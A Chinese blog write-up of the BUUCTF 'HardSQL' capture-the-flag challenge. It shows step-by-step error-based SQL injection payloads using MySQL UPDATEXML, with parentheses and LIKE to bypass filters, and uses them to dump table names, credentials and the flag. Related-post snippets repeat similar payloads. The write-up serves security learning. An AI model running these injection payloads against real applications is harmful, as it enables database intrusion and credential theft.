BUUCTF----[极客大挑战 2019]HardSQL

最新推荐文章于 2024-06-18 16:59:41 发布
最新推荐文章于 2024-06-18 16:59:41 发布
阅读量547 收藏 8
点赞数 10
分类专栏: web漏洞 文章标签: updatexml 报错注入 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/woshicainiao666/article/details/136588158
版权
本文探讨了如何利用MySQL的UPDATEXML函数进行报错注入,通过绕过空格、特殊字符,以及组合XPath和SQL查询来获取数据库敏感信息,最终揭示了部分flag。
摘要由CSDN通过智能技术生成

输入1’

在这里插入图片描述在这里插入图片描述

单引号闭合

进行永真式判断

在这里插入图片描述

竟然说我是臭弟弟----八嘎(肯定是进行了过滤)
经过手法判断,过滤了=,空格,and等

在这里插入图片描述

报错注入updatexml()

报错注入顾名思义就是,通过特殊函数错误使用并使其输出错误结果来获取信息的

UPDATEXML() 是 MySQL 数据库中的一个函数,它用于修改 XML 文档中的值。这个函数返回修改后的 XML 文档,并可以根据指定的 XPath 表达式和新的值来更新 XML 文档中的特定部分。

UPDATEXML() 函数的语法如下:

UPDATEXML(xml_doc, xpath_expr, new_value)
xml_doc:要修改的 XML 文档。
xpath_expr:用于定位要修改的 XML 文档部分的 XPath 表达式。
new_value:要插入到 XML 文档中的新值。

查库

空格用()绕过
=用like绕过

1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#

在这里插入图片描述

查表

1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#

在这里插入图片描述
查字段

1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#

在这里插入图片描述

1'or(updatexml(1,concat(0x7e,(select(group_concat(username,'--',password))from(H4rDsq1)),0x7e),1))#

在这里插入图片描述

只出现一半的flag,使用leftright函数,进行一半一半的查询

1'or(updatexml(1,concat(0x7e,(select(left(password,30))from(H4rDsq1)),0x7e),1))#

在这里插入图片描述

1'or(updatexml(1,concat(0x7e,(select(right(password,30))from(H4rDsq1)),0x7e),1))#

在这里插入图片描述

拼接得到完整的flag

flag{b999a4be-8147-468b-8eba-360a077eaef0}
郑 居中
关注
  • 10
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
微信小程序-极客学院.zip
04-14
你可以使用双大括号`{{ }}`将变量插入到WXML中,而这些变量的值是在JS中动态更新的。 3. **网络请求**:微信小程序提供了wx.request接口,用于向服务器发送HTTP请求,获取在线小说的数据。 4. **组件化开发**:...
thegeekdeveloper-portfolio:极客开发人员组合
05-13
极客开发人员组合 构建设置 # install dependencies $ npm install # serve with hot reload at localhost:3000 $ npm run dev # build for production and launch server $ npm run build $ npm start # generate ...
buuctf-[极客挑战 2019]HardSQL(小宇特详解)
小宇的web博客
01-26 2998
buuctf-[极客挑战 2019]HardSQL(小宇特详解) 遇到了SQL注入,先尝试一下万能密码,虽然感觉%100不能用 果不其然 双写再试一下发现也不行 这里使用extractvalue和updatexml进行报错注入,空格和=号没有,所以我们要使用()来代替空格,使用like来代替=号 使用extractvalue() /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database
BUUCTF [web专项25][极客挑战 2019]HardSQL
yanglinchiji的博客
11-05 250
right(password,32) (可以换成30,因为后面还有个}和~,32只是因为没有影响就没改)尝试报错注入(datexml和extractvalue两种,但是我看别人的wp都有,挺全的)那就用^代替and,用()代替空格,like代替等于号(如果还有需要代替的后面再说)发现这次过滤的很全,万能密码没有一个可以使用。经过测试,至少and,空格,等于 等被过滤。我们可以用right函数来获取后面的字符。发现只有一半,因为只能输出32字符。老常客了,进入后先用万能密码试试。拼凑即可获得flag。
BUUCTF关于sql注入的题目
2302_80935968的博客
04-19 779
测试的时候输入了 1’ and ‘1’='1这个有问题的payload,看报错信息中带有一个 and password=‘1’ and ‘1’=1 说明sql语句是SELECT * FROM tables WHERE username=‘1’ and ‘1’=1 and password=‘1’ and ‘1’=1 类似这样的查询,and 的两边同时为TRUE 结果才能为 TRUE,所以输入的payload一定要符合这个条件就可以登录成功了。(select 输入数据 || flag from Flag)
BUUCTFHardSQL[极客挑战 2019]
金 帛的博客
06-06 1290
buucft记录贴
[BUUCTF刷题]HardSQL
weixin_43952190的博客
07-03 2015
HardSQL 进入后是sql注入页面,过滤了一些字符,先进行fuzz测试。 发现过滤了union,双写也无法绕过,所以不能使用常规的方法进行注入。但发现没有过滤extractvalue和updatexml。 也过滤了空格,使用括号绕过。 首先,注数据库名称 username=admin'or(updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1))%23&password=1 然后得到表名(过滤=,使用like) userna
web buuctf [极客挑战 2019]HardSQL1
weixin_44214568的博客
03-15 1943
这题做了一下午,后来翻了一下别人的wp才发现,过滤了空格,服了。。 考点:报错注入 报错注入的应用是sql注入,页面无显示位,但有数据库的报错信息 报错注入使用函数(updatexml(xml_taget,xpath,new_xml)),这个函数是用来更新指定的xml文件,xpath的格式通常是为xx/xx/xx,传进去字符串就会报错,也就会显示报错信息, 利用updatexml(1,concat(0x7e,database()),2) concat函数将里面内容连成字符串,与xpath的格式不符
gradle-6.7.1-bin.zip
03-18
gradle-6.7.1-bin.zip gradle-6.7.1-bin.zip gradle-6.7.1-bin.zipgradle-6.7.1-bin.zip gradle-6.7.1-bin.zip gradle-6.7.1-bin.zip gradle-6.7.1-bin.zipgradle-6.7.1-bin.zipgradle-6.7.1-bin.zip ...
Certificate-Engine:极客之家的证书引擎
05-15
证书引擎这是技术协会House of Geeks的证书引擎的开发库。... 将其克隆到您的计算机。 在“ cehg / client / web-app”文件夹中打开终端/ cmd 运行“ npm install”以安装所有依赖项。 运行“ npm start”以启动开发...
eDEX-UI-Windows.exe
04-01
这款软件是一个类似于科幻电脑界面的全屏桌面应用程序,深受DEX-UI和TRON Legacy电影效果的启发。
BUUCTF [极客挑战 2019] HardSQL 1
最新发布
m0_74167420的博客
06-18 169
原因:在输入' 或者 # 号时,'会被识别出来过滤掉,#会注释掉后面的内容,因此要进行url编码。在该题目中,双写被过滤掉了,同时空格,=,union也被过滤了。或者, payload为: 用 ^ 符号代替 or。1、阅读题目,是SQL注入的题目类型。2、尝试万能密码和堆叠注入,均被过滤。
buuctf-HardSQL
m0_62094846的博客
04-02 1394
这道题过滤了很多sql注入的关键词(可以用bp,fuzz出来,下次试试) 包括空格,但是没有过滤报错注入的两个关键词updatexml和extractvalue 用报错注入 查库名(geek) ?username=1'or(updatexml(1,concat(0x7e,(database()),0x7e),1))%23&password=1 查找所有数据库 ?username=admin'or(updatexml(1,concat(0x7e,(select(grou...
BUUCTF [极客挑战 2019]HardSQL
m0_63253040的博客
03-28 2398
还是这个熟悉的登录页面 尝试万能密码登录,发现有过滤,一个一个试 过滤了空格,=,等等许多,双写也无法绕过,那么换报错注入试试
BUUCTF Writeup-Web-[极客挑战 2019]HardSQL 1
菜鸟之路
07-17 3590
BUUCTF WriteUp Web [极客挑战 2019]HardSQL 1 打开后提示sql注入,查看页面源代码: 发现是get两个参数username和password到check.php 因此可以直接用hackbar构造……/check.php?username=aaa&password=aaa,并执行就可以了。用burpsuite直接改数据也行。 然后开始注入,尝试加’、" 发现单引号有报错,双引号没有,没提示有括号,所以应该是普通单引号闭合的字符型注入点 出现这行字说明输入的被过
BUUCTF WEB HardSql
qq_41696858的博客
10-13 238
这题考的是报错注入 判断注入类型还是跟之前一样的,一个单引号’直接看出来是单引号闭合 下面就是注入方式了,之前的双写,堆叠肯定就不用想了,试试报错,emmm 关于报错注入,可以看这一篇,感觉写的还挺详细的,https://developer.aliyun.com/article/692723 基础payload: 账号:a'^extractvalue(1,concat('~',(select(database()))))#,密码123 成功爆破出来库名geek 空格被过滤了,所以需要空格来绕过 知道注入
buuctf 极客挑战 hardsql
SopRomeo的博客
01-19 3891
常规sql注入发现成这样了。 然后发现order by 和 union 都不行 报错注入就可以用了 可以使用extractvalue和updatexml进行报错注入 附上视频讲解https://www.bilibili.com/video/av77851975 输入的时候发现了 这题目还过滤了空格和and emmmm 用括号来代替空格就能绕过了 发现还不行 百度了web 的骚操作 用’^'来连接...
buuctf BabySQL+HardSQL
硫酸超的博客
11-20 3794
cbuuctf BabySQL 1、进入登录页面 2、随便输入 发现用户名和密码错误 3、尝试判断是否为字符型注入 根据报错,确定为单引号字符型注入,密码处也尝试了一下,发现也是单引号字符型注入,说明有2处注入漏洞 4、尝试万能密码 1’ or 1=1-- 发现or被过滤了 尝试双写or 成功绕过 这里说下双写or为什么可以绕过 因为这个网页只对or进行一次过滤,即将字符串中的or替换为空,但是我们可以双写or去绕过,我们也可以用||去代替or 但是发现这个密码并没有用 5、测试有哪些关键字
BUUCTF:[极客挑战 2019]HardSQL
末初的CSDN博客
11-07 586
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]HardSQL 使用Burpfuzz测试过滤了哪些关键字 过滤了空格、=、substring、mid等字符 Trick 使用()代替空格 使用like代替= 使用right、left代替substring、mid 注入过程如下 1'or(1)like(2)%23 1'or(updatexml('~',concat('~',
buuctf 极客挑战2019php
08-24
buuctf 极客挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的展示等。序列化是指将对象转化为字符串的过程,而反序列化则是将字符串转化为对象的过程。在PHP中,可以使用serialize()函数进行序列化,并使用var_dump()函数进行反序列化结果的展示。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [阿里云IoT极客创新挑战赛.pdf](https://download.csdn.net/download/weixin_38744375/11634853)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [【BUUCTF-Web】 [极客挑战 2019]PHP](https://blog.csdn.net/m0_51683653/article/details/126693573)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值